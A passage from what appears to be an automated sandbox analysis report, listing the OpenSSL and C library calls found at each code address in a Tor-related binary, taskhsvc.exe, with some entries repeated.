EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,CRYPTO_malloc,OPENSSL_cleanse,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,memmove,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_block_size,EVP_CIPHER_flags,EVP_CIPHER_CTX_ctrl,EVP_Cipher,EVP_CIPHER_flags,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_flags,EVP_CIPHER_iv_length,_iob,fprintf,OpenSSLDie,OpenSSLDie,RAND_bytes,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_type,ERR_put_error,EVP_MD_CTX_init,EVP_MD_CTX_copy_ex,EVP_DigestFinal_ex,EVP_MD_CTX_cleanup,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,EVP_MD_CTX_copy_ex,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_DigestFinal_ex,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestSignFinal,EVP_MD_CTX_copy,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,OpenSSLDie,__stack_chk_fail,ERR_put_error,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_malloc,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,__stack_chk_fail,86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBAE0 CRYPTO_add_lock,__stack_chk_fail,86_2_6CDCBAE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDEA97 strlen,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,BN_clear_free,86_2_6CDDEA97
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2A81 BIO_free,EVP_MD_CTX_destroy,CRYPTO_free,BIO_s_mem,BIO_new,BIO_ctrl,86_2_6CDA2A81
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCEA80 SSL_CTX_add_session,CRYPTO_add_lock,CRYPTO_lock,lh_insert,CRYPTO_add_lock,SSL_CTX_ctrl,SSL_CTX_ctrl,SSL_CTX_ctrl,lh_retrieve,CRYPTO_add_lock,CRYPTO_lock,lh_delete,CRYPTO_add_lock,lh_retrieve,__stack_chk_fail,86_2_6CDCEA80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FAB0 __stack_chk_fail,CRYPTO_malloc,CRYPTO_free,86_2_6CD9FAB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6290 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,CRYPTO_malloc,OPENSSL_cleanse,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,memmove,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_block_size,EVP_CIPHER_flags,EVP_CIPHER_CTX_ctrl,EVP_Cipher,EVP_CIPHER_flags,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_flags,EVP_CIPHER_iv_length,_iob,fprintf,OpenSSLDie,OpenSSLDie,RAND_bytes,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_type,ERR_put_error,EVP_MD_CTX_init,EVP_MD_CTX_copy_ex,EVP_DigestFinal_ex,EVP_MD_CTX_cleanup,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,EVP_MD_CTX_copy_ex,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_DigestFinal_ex,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestSignFinal,EVP_MD_CTX_copy,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,OpenSSLDie,__stack_chk_fail,ERR_put_error,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_malloc,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,__stack_chk_fail,86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0A69 CRYPTO_free,86_2_6CDD0A69
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBAA60 pitem_free,pqueue_pop,__stack_chk_fail,pqueue_free,pqueue_free,pqueue_free,pqueue_free,pqueue_free,CRYPTO_free,__stack_chk_fail,SSL_ctrl,__stack_chk_fail,__stack_chk_fail,86_2_6CDBAA60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE880 SRP_generate_client_master_secret,SRP_Verify_B_mod_N,SRP_Calc_u,SRP_Calc_x,SRP_Calc_client_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,strlen,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,__stack_chk_fail,86_2_6CDDE880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB2A02 CRYPTO_free,CRYPTO_malloc,86_2_6CDB2A02
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDACBF9 CRYPTO_free,86_2_6CDACBF9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDCBE0 SSL_set_bio,CRYPTO_add_lock,86_2_6CDDCBE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8B90 EVP_CIPHER_flags,CRYPTO_memcmp,__stack_chk_fail,86_2_6CDA8B90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB1E60 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,86_2_6CDB1E60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBCB95 pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBCB95
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB0C09 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,strlen,strlen,SSL_get_srtp_profiles,strncmp,CRYPTO_malloc,strlen,ERR_put_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,sk_pop_free,sk_new_null,sk_push,d2i_OCSP_RESPID,sk_pop_free,d2i_X509_EXTENSIONS,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,OCSP_RESPID_free,OCSP_RESPID_free,86_2_6CDB0C09
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC95D0 SSL_dup,SSL_new,SSL_copy_session_id,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,BIO_ctrl,BIO_ctrl,CRYPTO_add_lock,X509_VERIFY_PARAM_inherit,sk_dup,sk_dup,sk_dup,sk_value,X509_NAME_dup,sk_set,sk_num,X509_NAME_free,ERR_put_error,__stack_chk_fail,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,__stack_chk_fail,SSL_get_certificate,__stack_chk_fail,SSL_get_privatekey,__stack_chk_fail,SSL_CTX_get0_certificate,__stack_chk_fail,SSL_CTX_get0_privatekey,__stack_chk_fail,SSL_get_current_cipher,__stack_chk_fail,SSL_get_current_compression,__stack_chk_fail,SSL_get_current_expansion,__stack_chk_fail,86_2_6CDC95D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2B51 EVP_MD_CTX_destroy,CRYPTO_free,86_2_6CDA2B51
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDACB40 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CDACB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADB40 ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,CONF_parse_list,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,EC_KEY_get0_group,EC_GROUP_method_of,EC_METHOD_get_field_type,EC_GROUP_get_curve_name,ERR_put_error,EC_GROUP_get_curve_name,__stack_chk_fail,86_2_6CDADB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6290 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,CRYPTO_malloc,OPENSSL_cleanse,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,memmove,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_block_size,EVP_CIPHER_flags,EVP_CIPHER_CTX_ctrl,EVP_Cipher,EVP_CIPHER_flags,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_flags,EVP_CIPHER_iv_length,_iob,fprintf,OpenSSLDie,OpenSSLDie,RAND_bytes,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_type,ERR_put_error,EVP_MD_CTX_init,EVP_MD_CTX_copy_ex,EVP_DigestFinal_ex,EVP_MD_CTX_cleanup,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,EVP_MD_CTX_copy_ex,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_DigestFinal_ex,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestSignFinal,EVP_MD_CTX_copy,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,OpenSSLDie,__stack_chk_fail,ERR_put_error,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_malloc,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,__stack_chk_fail,86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBB42 RSA_free,DH_free,EC_KEY_free,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CDCBB42
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDCB69 SSL_get_rbio,BIO_push,CRYPTO_add_lock,86_2_6CDDCB69
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF870 SSL_set_session,SSL_set_ssl_method,CRYPTO_add_lock,CRYPTO_add_lock,CRYPTO_add_lock,SSL_set_ssl_method,ERR_put_error,__stack_chk_fail,SSL_SESSION_set_timeout,__stack_chk_fail,SSL_SESSION_get_timeout,__stack_chk_fail,SSL_SESSION_get_time,__stack_chk_fail,SSL_SESSION_set_time,__stack_chk_fail,SSL_SESSION_get0_peer,__stack_chk_fail,SSL_SESSION_set1_id_context,ERR_put_error,__stack_chk_fail,SSL_CTX_set_timeout,__stack_chk_fail,SSL_CTX_get_timeout,__stack_chk_fail,SSL_set_session_secret_cb,__stack_chk_fail,SSL_set_session_ticket_ext_cb,__stack_chk_fail,SSL_set_session_ticket_ext,CRYPTO_free,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CDCF870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6290 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,CRYPTO_malloc,OPENSSL_cleanse,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,memmove,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_block_size,EVP_CIPHER_flags,EVP_CIPHER_CTX_ctrl,EVP_Cipher,EVP_CIPHER_flags,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_flags,EVP_CIPHER_iv_length,_iob,fprintf,OpenSSLDie,OpenSSLDie,RAND_bytes,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_type,ERR_put_error,EVP_MD_CTX_init,EVP_MD_CTX_copy_ex,EVP_DigestFinal_ex,EVP_MD_CTX_cleanup,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,EVP_MD_CTX_copy_ex,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_DigestFinal_ex,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestSignFinal,EVP_MD_CTX_copy,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,OpenSSLDie,__stack_chk_fail,ERR_put_error,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_malloc,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,__stack_chk_fail,86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD929B0 EVP_MD_CTX_init,BN_num_bits,BN_num_bits,EVP_MD_CTX_set_flags,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,RSA_sign,EVP_MD_CTX_cleanup,DHparams_dup,DH_generate_key,BN_num_bits,BN_num_bits,BN_num_bits,BUF_MEM_grow_clean,BN_bn2bin,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_SignFinal,BN_num_bits,EC_KEY_dup,EC_KEY_get0_public_key,EC_KEY_get0_private_key,EC_KEY_generate_key,EC_KEY_get0_group,EC_KEY_get0_public_key,EC_KEY_get0_private_key,EC_GROUP_get_degree,EC_GROUP_get_curve_name,EC_KEY_get0_public_key,EC_POINT_point2oct,CRYPTO_malloc,BN_CTX_new,EC_KEY_get0_public_key,EC_POINT_point2oct,BN_CTX_free,strlen,strlen,strlen,strncpy,strlen,CRYPTO_free,EVP_PKEY_size,ERR_put_error,CRYPTO_free,BN_CTX_free,EVP_MD_CTX_cleanup,strlen,RSA_up_ref,ERR_put_error,EC_KEY_new_by_curve_name,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,ERR_put_error,86_2_6CD929B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB7B3C CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,86_2_6CDB7B3C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD99B30 CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_Digest,SSL_SESSION_free,SSL_CTX_remove_session,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CD99B30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC3B30 SSL_new,CRYPTO_malloc,CRYPTO_add_lock,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CDC3B30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD98B20 ERR_put_error,sk_new_null,sk_push,d2i_X509,ERR_put_error,ERR_put_error,ERR_clear_error,sk_value,X509_get_pubkey,X509_free,ERR_put_error,ERR_put_error,ERR_put_error,EVP_PKEY_missing_parameters,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_add_lock,X509_free,X509_free,CRYPTO_add_lock,__stack_chk_fail,86_2_6CD98B20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA5070 ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_CIPHER_CTX_flags,CRYPTO_memcmp,ERR_put_error,COMP_expand_block,ERR_put_error,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CDA5070
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC95D0 SSL_dup,SSL_new,SSL_copy_session_id,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,BIO_ctrl,BIO_ctrl,CRYPTO_add_lock,X509_VERIFY_PARAM_inherit,sk_dup,sk_dup,sk_dup,sk_value,X509_NAME_dup,sk_set,sk_num,X509_NAME_free,ERR_put_error,__stack_chk_fail,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,__stack_chk_fail,SSL_get_certificate,__stack_chk_fail,SSL_get_privatekey,__stack_chk_fail,SSL_CTX_get0_certificate,__stack_chk_fail,SSL_CTX_get0_privatekey,__stack_chk_fail,SSL_get_current_cipher,__stack_chk_fail,SSL_get_current_compression,__stack_chk_fail,SSL_get_current_expansion,__stack_chk_fail,86_2_6CDC95D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6290 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,CRYPTO_malloc,OPENSSL_cleanse,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,memmove,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_block_size,EVP_CIPHER_flags,EVP_CIPHER_CTX_ctrl,EVP_Cipher,EVP_CIPHER_flags,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_flags,EVP_CIPHER_iv_length,_iob,fprintf,OpenSSLDie,OpenSSLDie,RAND_bytes,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_type,ERR_put_error,EVP_MD_CTX_init,EVP_MD_CTX_copy_ex,EVP_DigestFinal_ex,EVP_MD_CTX_cleanup,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,EVP_MD_CTX_copy_ex,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_DigestFinal_ex,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestSignFinal,EVP_MD_CTX_copy,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,OpenSSLDie,__stack_chk_fail,ERR_put_error,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_malloc,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,__stack_chk_fail,86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA04CC CRYPTO_free,CRYPTO_malloc,86_2_6CDA04CC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD24EC CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD24EC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA4E0 SSL_CTX_get_ex_new_index,CRYPTO_get_ex_new_index,86_2_6CDCA4E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC480 CRYPTO_add_lock,sk_pop_free,X509_free,RSA_free,DH_free,EC_KEY_free,__stack_chk_fail,__stack_chk_fail,86_2_6CDCC480
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB1485 CRYPTO_malloc,strlen,86_2_6CDB1485
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA4A0 SSL_get_ex_data,CRYPTO_get_ex_data,86_2_6CDCA4A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC445C CRYPTO_lock,lh_retrieve,CRYPTO_lock,86_2_6CDC445C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8450 CRYPTO_lock,CRYPTO_lock,CRYPTO_free,CRYPTO_lock,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,86_2_6CDA8450
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC3450 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,sk_free,sk_free,SSL_SESSION_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,CRYPTO_free,CRYPTO_add_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,sk_pop_free,sk_pop_free,CRYPTO_free,CRYPTO_free,sk_pop_free,CRYPTO_add_lock,CRYPTO_free,sk_free,CRYPTO_free,BIO_pop,__stack_chk_fail,86_2_6CDC3450
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA450 SSL_set_ex_data,CRYPTO_set_ex_data,86_2_6CDCA450
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD2452 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD2452
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC3C0 CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CDCC3C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB8445 CRYPTO_realloc,86_2_6CDB8445
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB475 EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_add_lock,CRYPTO_add_lock,86_2_6CDCB475
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE46C CRYPTO_free,86_2_6CDAE46C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAC460 HMAC_CTX_init,EVP_CIPHER_CTX_init,EVP_MD_size,EVP_CIPHER_CTX_iv_length,memcmp,EVP_sha256,HMAC_Init_ex,EVP_aes_128_cbc,EVP_DecryptInit_ex,HMAC_Update,HMAC_Final,HMAC_CTX_cleanup,CRYPTO_memcmp,EVP_CIPHER_CTX_cleanup,HMAC_CTX_cleanup,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,EVP_CIPHER_CTX_cleanup,d2i_SSL_SESSION,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,__stack_chk_fail,EC_curve_nist2nid,OBJ_sn2nid,OBJ_ln2nid,__stack_chk_fail,strchr,OBJ_sn2nid,OBJ_ln2nid,__stack_chk_fail,86_2_6CDAC460
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD52D8 X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,ERR_put_error,RSA_flags,ERR_put_error,EVP_PKEY_free,86_2_6CDD52D8
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD5419 EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,86_2_6CDD5419
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE41C CRYPTO_free,86_2_6CDAE41C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0320 SSL_CTX_get_info_callback,__stack_chk_fail,SSL_CTX_set_client_cert_cb,__stack_chk_fail,SSL_CTX_get_client_cert_cb,__stack_chk_fail,SSL_CTX_set_client_cert_engine,ENGINE_init,ENGINE_get_ssl_client_cert_function,ERR_put_error,ERR_put_error,ENGINE_finish,__stack_chk_fail,SSL_CTX_set_cookie_generate_cb,__stack_chk_fail,SSL_CTX_set_cookie_verify_cb,__stack_chk_fail,PEM_read_bio_SSL_SESSION,PEM_ASN1_read_bio,__stack_chk_fail,PEM_read_SSL_SESSION,PEM_ASN1_read,__stack_chk_fail,PEM_write_bio_SSL_SESSION,PEM_ASN1_write_bio,__stack_chk_fail,PEM_write_SSL_SESSION,PEM_ASN1_write,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,86_2_6CDD0320
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8402 CRYPTO_lock,86_2_6CDA8402
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC400 SSL_CONF_CTX_set1_prefix,BUF_strdup,CRYPTO_free,strlen,CRYPTO_free,__stack_chk_fail,SSL_CONF_CTX_set_ssl,__stack_chk_fail,SSL_CONF_CTX_set_ssl_ctx,__stack_chk_fail,SSL_set_info_callback,__stack_chk_fail,SSL_shutdown,CRYPTO_free,SSL_free,__stack_chk_fail,strlen,BIO_write,__stack_chk_fail,BIO_clear_flags,SSL_read,SSL_get_error,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,time,SSL_renegotiate,SSL_renegotiate,__stack_chk_fail,BIO_clear_flags,SSL_write,SSL_get_error,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,time,SSL_renegotiate,SSL_renegotiate,__stack_chk_fail,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,SSL_get_rbio,BIO_push,CRYPTO_add_lock,__stack_chk_fail,BIO_set_flags,BIO_callback_ctrl,86_2_6CDDC400
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD93432 CRYPTO_free,86_2_6CD93432
